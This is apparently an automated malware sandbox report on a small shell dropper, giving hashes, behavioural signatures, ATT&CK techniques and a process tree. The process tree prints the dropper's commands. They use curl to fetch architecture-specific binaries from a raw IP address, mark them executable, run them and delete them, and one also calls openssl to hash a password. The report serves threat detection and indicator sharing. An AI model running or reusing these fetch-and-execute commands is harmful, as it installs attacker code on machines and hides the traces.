Analysis

  • max time kernel
    148s
  • max time network
    147s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240226-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240226-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    13-03-2024 23:00

General

  • Target

    exec.sh

  • Size

    842B

  • MD5

    4eeac4436b9c68f85b1c3a2bae62d3f3

  • SHA1

    4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1

  • SHA256

    bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520

  • SHA512

    e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 8 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/exec.sh
    /tmp/exec.sh
    1⤵
    PID:642
    • /usr/bin/curl
      curl -o 386_binary http://5.10.249.153:9999/386
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:646
    • /bin/chmod
      chmod +x 386_binary
      2⤵
      PID:757
    • /tmp/386_binary
      ./386_binary
      2⤵
      • Executes dropped EXE
      PID:758
    • /bin/rm
      rm -rf 386_binary
      2⤵
      PID:760
    • /usr/bin/curl
      curl -o amd64_binary http://5.10.249.153:9999/amd64
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:761
    • /bin/chmod
      chmod +x amd64_binary
      2⤵
      PID:768
    • /tmp/amd64_binary
      ./amd64_binary
      2⤵
      • Executes dropped EXE
      PID:769
    • /bin/rm
      rm -rf amd64_binary
      2⤵
      PID:771
    • /usr/bin/curl
      curl -o arm_binary http://5.10.249.153:9999/arm
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:772
    • /bin/chmod
      chmod +x arm_binary
      2⤵
      PID:779
    • /tmp/arm_binary
      ./arm_binary
      2⤵
      • Executes dropped EXE
      • Enumerates kernel/hardware configuration
      PID:780
      • /usr/bin/openssl
        openssl passwd -6 scmg40I9gecr
        3⤵
        PID:784
    • /bin/rm
      rm -rf arm_binary
      2⤵
      PID:785
    • /usr/bin/curl
      curl -o arm64_binary http://5.10.249.153:9999/arm64
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:786

Network

MITRE ATT&CK Matrix ATT&CK v13

  • Defense Evasion
    Virtualization/Sandbox Evasion
    1
    T1497
  • Discovery
    Virtualization/Sandbox Evasion
    1
    T1497
  • Discovery
    System Information Discovery
    1
    T1082


Downloads

  • /tmp/386_binary
    Filesize
    420KB
    MD5
    c844c5c14bd7b2ca8d8a585f0bb4b0c8
    SHA1
    d5f7155b192c31f9d8842a36a92047ef171ea10f
    SHA256
    a5f83fdef2bae782dd96949e9d1caa38440621f9b4a61008be1acda95ee87e92
    SHA512
    8b74d415627379c8e9f862821f462406654bd40b1391a65a3c43056bf62026e3d3218d8567e14f678e172e95c0853b9bc9667c5a2c280fa891cb292d8aab8663

  • /tmp/amd64_binary
    Filesize
    64KB
    MD5
    733642767a2782e29b1300f0cc3bb5af
    SHA1
    a0f8d340e855f752f4597c833b3a0ea9d617238d
    SHA256
    c7f031e99869413fe8e58fdf04768fc42edbadd773639eb13bddafe2161643dc
    SHA512
    17b29aca11bf10268aa43689cd199b3adbdadcf052c2bb4365255979524ad3822546d243068f3d3a0812ac4fe1e1db4f2bee7a4183c8c626ae9c82a64572a9e4

  • /tmp/arm64_binary
    Filesize
    19KB
    MD5
    f8b0a6c9ed9d33191661fce600b819ac
    SHA1
    cd3e411eb4e115c249a25bde87f7e3d876bf245d
    SHA256
    1364c16c4464d2840c2316bb0c9508dcfff922e121192596342189b2826d6557
    SHA512
    7f441f9195a2ac1f01f92c081624c4eaedc0ef30d093d1990e9cb52a5da27a90a5b1abd64df75b57774fadb1b23cb35c2f41aca2325f702e687213fcdef47770

  • /tmp/arm_binary
    Filesize
    168KB
    MD5
    6818fc04117b0863b9489962c744bce6
    SHA1
    ba296427584041f5fcbdb56c8280387ffe42137e
    SHA256
    e469a8fe15ef6d6f28380f3a268423dd501d1d653b164d88412362e2f2c76b43
    SHA512
    7a57546909cb6c4672f28575243c87aa023828cee4660e64b98b22394ebb8858ca7d812c3bd622ba57dff708bb0c09fb2df2e8768e541b4939176744fa4f062f